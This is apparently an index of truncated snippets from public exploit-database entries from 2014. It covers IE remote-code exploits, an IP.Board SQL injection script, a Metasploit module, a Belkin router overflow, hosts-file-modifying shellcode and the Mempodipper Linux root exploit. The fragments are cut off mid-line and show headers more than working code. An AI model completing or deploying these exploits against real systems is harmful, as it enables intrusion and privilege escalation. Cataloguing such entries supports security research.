//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// !doctype html html meta http-equiv=X-UA-Compatible content=IE=EmulateIE8 head /head body SCRIPT LANGUAGE
#!/usr/bin/env python# Sunday, November 09, 2014 - secthrowaway@safe-mail.net# IP.Board = 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadableurl = 'http://target.tld/forum/
!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy aymansagy@gmail.com https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 -- html head title MS14-035 IE8 Use-after-free Ex
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxili
Insecure management of login credentials in PicsArt Photo Studio for Android 1. *Advisory Information* Title: Insecure management of login credentials in PicsArt Photo Studio for Android Advisory ID: STIC-2014-0426 Advisory URL: http://www.fundacion
Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/ A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.1
#Exploit Title:i.Hex Local Crash Poc #Homepage: http://www.memecode.com/ihex.php #Software Link:www.memecode.com/data/ihex-win32-v0.98.exe #Version:i.Hex-v0.98 (Win32 Release) #Description:i.Hex is a small and free graphical Hex Editor for Windows..
/** ;modify_hosts.asm ;this program add a new entry in hosts file pointing google.com to 127.1.1.1 ;author Javier Tejedor ;date 24/09/2014 global _start section .text _start: xor ecx, ecx mul ecx mov al, 0x5 push ecx push 0x7374736f ;/etc///hosts pu
/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c Blog post about it is here: http://blog.zx2c4.com/749 */ /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this ti